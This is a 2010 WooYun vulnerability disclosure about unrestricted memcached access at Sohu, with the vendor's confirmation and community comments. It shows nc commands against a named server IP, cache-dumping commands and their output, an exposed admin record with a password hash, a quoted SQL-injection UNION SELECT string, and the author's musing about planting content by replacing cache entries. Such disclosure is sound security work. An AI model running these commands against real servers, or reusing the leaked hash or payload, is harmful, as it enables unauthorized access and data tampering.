当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0790

漏洞标题:memcached未作IP限制导致缓存数据可被攻击者控制

相关厂商:Sohu.com

漏洞作者: yunshu

提交时间:2010-11-06 20:50

修复时间:2010-12-06 21:00

公开时间:2010-12-06 21:00

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-11-06: 细节已通知厂商并且等待厂商处理中
2010-11-08: 厂商已经确认,细节仅向厂商公开
2010-11-18: 细节向核心白帽子及相关领域专家公开
2010-11-28: 细节向普通白帽子公开
2010-12-08: 细节向实习白帽子公开
2010-12-06: 细节向公众公开

简要描述:

不正确的memcache配置会导致安全问题

详细说明:

C:\>nc -vv 61.135.178.118 11211
61.135.178.118: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [61.135.178.118] 11211 (?) open
stats items
STAT items:4:number 1544729
STAT items:4:age 4772005
STAT items:5:number 101088
STAT items:5:age 18142497
STAT items:6:number 729610
STAT items:6:age 1410176
STAT items:7:number 1019924
STAT items:7:age 2873336
STAT items:8:number 1458432
STAT items:8:age 1503000
STAT items:9:number 155117
STAT items:9:age 600906
STAT items:10:number 159866
STAT items:10:age 1730665
STAT items:11:number 12428
STAT items:11:age 902232
STAT items:12:number 762
STAT items:12:age 7623799
END
stats cachedump 12 10
ITEM 176174226#me [1020 b; 1249516659 s]
ITEM 173853058#me [1053 b; 1249516659 s]
ITEM 184790733#me [1031 b; 1249516659 s]
ITEM 184189728#me [1047 b; 1249516659 s]
ITEM 184067484#me [1050 b; 1249516659 s]
ITEM 179228126#me [1043 b; 1249516659 s]
ITEM 180014248#me [1018 b; 1249516659 s]
ITEM 184112063#me [1024 b; 1249516659 s]
ITEM 171451939#me [1026 b; 1249516659 s]
ITEM 154896159#me [1038 b; 1249516659 s]
END
这是某博客的cache


浏览了一下得到的URL,确定是那个cache取到的数据。如果我replace一下,能不能挂点东西?
update:
扫描了3个C类,发现了更多有意思的东西,如passport之类:
get admin_user_admin
VALUE admin_user_admin 1 207
a:8:{s:3:"uid";s:1:"1";s:8:"username";s:5:"admin";s:6:"passwd";s:32:"da2100201af
e5c13dcdbb197b65f8bab";s:7:"regdate";s:1:"0";s:7:"logdate";s:1:"0";s:5:"logip";s
:0:"";s:5:"intro";s:0:"";s:5:"level";s:2:"99";}
还有cache的被人注入的SQL语句,ITEM adidas_time_date_product_day_clickcount_1299_and_1=2_union_select_1,user(),
version(),4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2
6,27,28,29,30,31,32,33 [1 b; 1261980551 s],嘿嘿。

漏洞证明:

修复方案:

版权声明:转载请注明来源 yunshu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2010-11-08 14:30

厂商回复:

感谢云舒, 我们立刻处理.

最新状态:

暂无


漏洞评价:

评论

  1. 2010-11-07 02:02 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    哈哈...评论这么邪恶的功能终于有了...最近挖点360和QQ的洞吧..

  2. 2010-11-08 13:45 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这个漏洞很不错 奇缺这种!!

  3. 2010-11-09 15:30 | GaRY ( 实习白帽子 | Rank:39 漏洞数:3 | 真悲剧平男君)

    给力啊,这个漏洞

  4. 2010-11-15 11:33 | 鲍勃 ( 路人 | Rank:1 漏洞数:1 | 行者)

    太给力了

  5. 2010-12-07 10:43 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    学习了

  6. 2010-12-08 22:19 | SpookZanG ( 普通白帽子 | Rank:113 漏洞数:15 | 我是……一只.....菜菜菜菜鸟)

    这个确实不错

  7. 2011-11-09 10:32 | softbug ( 实习白帽子 | Rank:66 漏洞数:10 | 为人类设计最好的软件,解放人的双手,一起...)

    没道理啊,封端口是最基本的,这最基本的都不做,搞不懂运维是不是放的测试机出来给你玩啊 云舒。

  8. 2012-12-29 08:23 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    @softbug cache怎能封端口...远程获取

  9. 2013-10-22 14:59 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    mark

  10. 2014-03-30 22:45 | 小贱人 ( 路人 | Rank:4 漏洞数:3 | 资深菜鸟,)

    不错